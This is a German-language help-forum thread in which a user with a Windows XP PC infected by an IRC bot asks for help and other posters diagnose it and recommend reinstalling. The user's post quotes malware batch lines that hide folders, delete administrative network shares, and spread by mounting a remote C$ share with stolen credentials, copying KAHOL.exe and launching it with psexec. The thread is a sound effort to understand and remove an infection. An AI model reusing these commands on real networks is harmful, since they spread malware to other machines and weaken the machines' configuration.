MIRC-Popup --> PC verseucht mit Trojanern

ich hatte auf meinen PC ein MIRC-Popup-Fenster, obwohl ich diese Software gar nicht verwende und seither habe ich jede menge Trojaner-Meldungen:

- W32/Agent.IHM
- W32/ServU.5_OE
- W32/IRCFlood.EY
- W32/Hackmoo.A

und alle verweisen auf div. Dateien unter c:\winnt\system32\os was mir schon seltsam vorkam, da ich winXP habe und somit kein winnt-verzeichnis habe sondern c:\windows.
in diesem winnt-verzeichnis hatte es jede menge bat-dateien, ich poste kurz ein paar auszüge davon, kann damit nicht viel anfangen:

attrib +r +h +s iL.dbx
attrib +r +h +s c:\winnt
attrib +r +h +s c:\winnt\system32
attrib +r +h +s c:\winnt\system32\os
devcheck.exe /n /fh /r "lock.bat"

net share /delete IPC$ /y
net share /delete ADMIN$ /y
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y

net use \\%1\C$ "%3" "/user:%2"
md \\%1\C$\winnt\system32\os
copy KAHOL.exe \\%1\C$\winnt\system32\os
psexec \\%1 -u "%2" -p "%3" -d "c:\winnt\system32\os\KAHOL.exe"

auch geht bei der windowsanmeldung ein dosfenster auf in der die datei kill.exe ausgeführt wird.

ich habe dann im abgesicherten Modus die Systemwiederherstellung deaktivert, das ganze verzeichnis winnt gelöscht, mit hijackthis, ad-aware und norman antivirus alles abgescannt und dachte eigentlich es währe somit erledigt.

nun, zwei tage später bekomme ich wieder meldungen über
- W32/Suspicions_T.gen
- SDBot.gen8
die nun alle ins richtige windows\system32 verweisen.

kann ich diese trojaner oder was ich alles habe noch loswerden oder am besten gleich den PC neu aufsetzen?

Ich vermute mal, du bist ein IRC Zombie geworden.
Die Batch Datei löscht dir sämtliche Netzwerkfreigaben und kopiert sich kahol.exe in besagtes winnt system. Wie das Scanresultat für diese Datei auf virustotal.com aussehen würde wäre vielleicht hilfreich um den Schädling einen genauen Namen zu geben, ansonsten würde ich eher zur Formatierung raten. Der Schädling scheint tief im System zu hängen, und abgesehen davon bleibt stets ein Restrisiko, wenn eine Backdoor mal auf dem PC war.

ich denke auch das die neuinstallation die sicherste variante ist, allerdings würde ich das mit virustotal.com doch gern mal ausprobieren.

ich habe noch alle dateien dieses winnt-verzeichnis, soll ich eine dieser dateien hochladen oder eine der verseuchten dateien die mir das virusprogramm angibt?
obwohl, diese datei wird gleich vom virusprogramm isoliert, weis nicht ob dort noch etwas angegeben wird

ich habe jetzt zwei files bei virustotal.com heraufgeladen und folgendes als ergebnis bekommen

file: kahol.bat (windows\system32)
- etrust: BAT/IRCFlood
- McAfee: IRC-Mutin
- TheHacker: W32/Graps.bat

file: dxinfo.exe (windows\system32)
- ClamAV: PUA.IRC-Client.mIRC-23
- CAT-QuickHeal: ClientIRC.mIRC.617 (Not a Virus)
- Ikarus: ClientIRC.mIRC.617 (Not a Virus)
- Kaspersky: ClientIRC.mIRC.617 (Not a Virus)

und das würde wohl noch endlos so weiter gehn, werde den pc neu aufsetzten, wenn ich nur wüsste was ich gemacht habe um sowas einzufangen :wah:

Der mIRC Client hat im Sys32 Ordner nichts verloren, vor allem dann nicht, wenn du es nichtmal verwendest. Das bestätigt meine Vermutung vom IRC Bot, die sich zwar selbständig verbreiten, aber nicht durch Systemangriffe, sondern eher durch Instant Messenger etc - du dürftest die Datei also selbst ausgeführt haben
Zu gucken, wohin der Bot eine Verbindung aufbaut (dürfte auf Port 6667) sein, könnte da ein Indiz sein. Ansonsten kannst wohl nur du dir selbst diese Frage beantworten
Für das nächste System empfielht sich ein Scanner mit vernünftigem Registry / proactive Schutz.